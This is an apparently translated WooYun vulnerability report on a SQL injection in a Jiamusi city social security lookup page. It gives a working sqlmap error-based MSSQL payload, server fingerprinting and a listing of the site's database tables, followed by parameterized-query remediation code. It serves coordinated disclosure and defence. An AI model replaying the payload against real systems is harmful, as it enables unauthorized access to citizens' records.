
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0144988

Title: SQL injection vulnerability in the Human Resources and Social Security website of a city in Heilongjiang

Related vendor: Human Resources and Social Security website of a city in Heilongjiang

Author: 毛毛虫

Submitted: 2015-10-06 13:21

Fixed: 2015-11-26 10:52

Published: 2015-11-26 10:52

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags: (none)



Vulnerability details

Disclosure status:

2015-10-06: Details sent to the vendor; awaiting the vendor's handling
2015-10-12: Vendor confirmed; details disclosed to the vendor only
2015-10-22: Details disclosed to core white hats and experts in the relevant field
2015-11-01: Details disclosed to regular white hats
2015-11-11: Details disclosed to intern white hats
2015-11-26: Details disclosed to the public

Brief description:

The Human Resources and Social Security website of Jiamusi City, Heilongjiang Province has a SQL injection vulnerability!

Detailed description:

1. Vulnerable URL

http://**.**.**.**/shebaokachaxun.asp


2. Injection point (sqlmap output; the wrapped payload and vector lines are rejoined here)
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Action=search_query&ID=&qID=98765'+(SELECT 'CNtZ' WHERE 1504=1504 AND 8115=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8115=8115) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113))))+'
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
3. Server information
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

Proof of vulnerability:

1. Databases (7)
available databases [7]:
[*] HRSI
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
2. Enumerated tables in HRSI: 117 tables in total
Database: HRSI
[117 tables]
+-----------------------------------+
| Business_Class |
| CompanyType |
| JY_CallBid |
| JY_Contract |
| JY_Customer |
| JY_GongQiu |
| JY_Job |
| JY_Sort |
| JY_bid |
| JY_order |
| JiaYin_Address |
| JiaYin_Admin |
| JiaYin_Ads |
| JiaYin_Announce |
| JiaYin_Article |
| JiaYin_Channel |
| JiaYin_ChengGuo |
| JiaYin_City_Area |
| JiaYin_Comment |
| JiaYin_Company |
| JiaYin_Company_Department |
| JiaYin_CreateFiles |
| JiaYin_CreateFiles_bak |
| JiaYin_Css |
| JiaYin_Document |
| JiaYin_Favorite |
| JiaYin_Friend |
| JiaYin_Guest |
| JiaYin_Js |
| JiaYin_Keyword |
| JiaYin_Label |
| JiaYin_LianTong_Service |
| JiaYin_LinkClass |
| JiaYin_LinkSite |
| JiaYin_Log_Admin |
| JiaYin_Log_Card_Buy |
| JiaYin_Log_Card_Transfer |
| JiaYin_Log_Consume |
| JiaYin_Log_Sqlin |
| JiaYin_Message |
| JiaYin_Module |
| JiaYin_Module_Method |
| JiaYin_Module_Method_updated |
| JiaYin_Movie |
| JiaYin_Movie_learn |
| JiaYin_Page |
| JiaYin_PeiXunJianDing |
| JiaYin_Photo |
| JiaYin_Product |
| JiaYin_Product_Categories |
| JiaYin_Products |
| JiaYin_Role |
| JiaYin_Role_Power |
| JiaYin_School |
| JiaYin_School_High_School_Class |
| JiaYin_School_Major |
| JiaYin_School_Plan |
| JiaYin_School_Query |
| JiaYin_School_Study_Level |
| JiaYin_School_Study_years |
| JiaYin_School_Subject |
| JiaYin_School_Willing |
| JiaYin_Server |
| JiaYin_SheBaoKaCaXun |
| JiaYin_ShenQing |
| JiaYin_Soft |
| JiaYin_Special |
| JiaYin_Style |
| JiaYin_StyleHelp |
| JiaYin_System |
| JiaYin_Teach_Learn_Note |
| JiaYin_Teach_Test |
| JiaYin_Teach_Test_Log |
| JiaYin_Telecom_Custom |
| JiaYin_Telecom_Device |
| JiaYin_Telecom_Node |
| JiaYin_Telecom_WorkFlow |
| JiaYin_Telecom_WorkLog |
| JiaYin_Template |
| JiaYin_UpFileLog |
| JiaYin_User |
| JiaYin_UserCz |
| JiaYin_UserGroup |
| JiaYin_User_Count |
| JiaYin_User_Edu |
| JiaYin_User_Online |
| JiaYin_User_ReadLog |
| JiaYin_Vote |
| JiaYin_Votes |
| JiaYin_YiQi |
| JiaYin_ZhuanJia |
| JiaYin_liuYan |
| JiaYin_report |
| JiaYin_user_Document |
| Jiayin_Product_Attribute |
| Jiayin_Product_Attribute_Category |
| Jiayin_Product_Attribute_Group |
| Jiayin_Product_Price |
| Jiayin_Product_TradeMark |
| Jiayin_Province |
| Jiayin_School_High_school |
| Jiayin_Teach_Group |
| Jiayin_Teach_Test_Paper |
| Jiayin_User_Category |
| Jiayin_city |
| Jiayin_school_Study_Topics |
| Product_Cart |
| dtproperties |
| jiayin_Class |
| jiayin_school_score_college |
| leAuditCollectAlerts |
| leAuditCollectConfigVars |
| leAuditCollectDatabases |
| leAuditCollectEventData |
| leAuditCollectNotification |
| sysconstraints |
| syssegments |
+-----------------------------------+

Remediation:

Filter (validate) user input.
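The report only says "filter", and the leading quote in the sqlmap payload (qID=98765'+...) shows the value was being concatenated straight into a SQL string literal. The following is an added example, not code from the report or from the affected site, of how a classic ASP lookup page against SQL Server can be written so the value never becomes part of the SQL text: an allow-list check on the input's shape, then an ADODB.Command with a bound parameter. The table name JiaYin_SheBaoKaCaXun comes from the report's table listing; the column names CardNo and HolderName, the connection string and the server names are hypothetical placeholders.

```vbscript
<%
' Added example (not the report's or the site's code): hardened card lookup
' that reads qID from a POST form. Assumed/hypothetical: the columns CardNo
' and HolderName, and the DB_HOST / APP_USER / PASSWORD placeholders below.
Option Explicit

' ADO constants (normally provided by adovbs.inc)
Const adCmdText = 1
Const adParamInput = 1
Const adVarChar = 200

Dim qID, re, conn, cmd, rs

qID = Trim(Request.Form("qID"))

' Allow-list the input's shape first: a card lookup key is digits only,
' so quotes, operators and comment sequences are rejected up front.
Set re = New RegExp
re.Pattern = "^[0-9]{1,20}$"
If Not re.Test(qID) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid query ID."
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=SQLOLEDB;Data Source=DB_HOST_PLACEHOLDER;" & _
          "Initial Catalog=HRSI;User ID=APP_USER_PLACEHOLDER;" & _
          "Password=PASSWORD_PLACEHOLDER"

' Parameterized query: the value is sent to SQL Server as a bound parameter,
' not spliced into the statement, so it cannot change the query's structure.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT CardNo, HolderName FROM JiaYin_SheBaoKaCaXun WHERE CardNo = ?"
cmd.Parameters.Append cmd.CreateParameter("@CardNo", adVarChar, adParamInput, 20, qID)

Set rs = cmd.Execute

If rs.EOF Then
    Response.Write "No record found."
Else
    ' Encode on output as well, so stored data cannot inject HTML into the page.
    Response.Write Server.HTMLEncode(rs("CardNo")) & " - " & _
                   Server.HTMLEncode(rs("HolderName"))
End If

rs.Close
conn.Close
Set rs = Nothing
Set cmd = Nothing
Set conn = Nothing
%>
```

The same ADODB.Command pattern applies to the page's other form field (ID) and to every other query on the site; a regex check alone is not a substitute for the bound parameter, it only narrows what reaches the database. Separately, the proof section lists master, msdb and the sample databases Northwind and pubs alongside HRSI, which indicates the application's database login could see far more than a lookup page needs; a dedicated login with SELECT on only the queried table limits what any remaining injection can reach.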

Copyright notice: when reposting, please credit the source: 毛毛虫@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-12 10:51

Vendor reply:

CNVD has confirmed the reported issue and forwarded it via CNCERT to the Heilongjiang branch center, which will coordinate handling with the website's operating unit. The issue has also been reported to the Information Center of the Ministry of Human Resources and Social Security.

Latest status:

None yet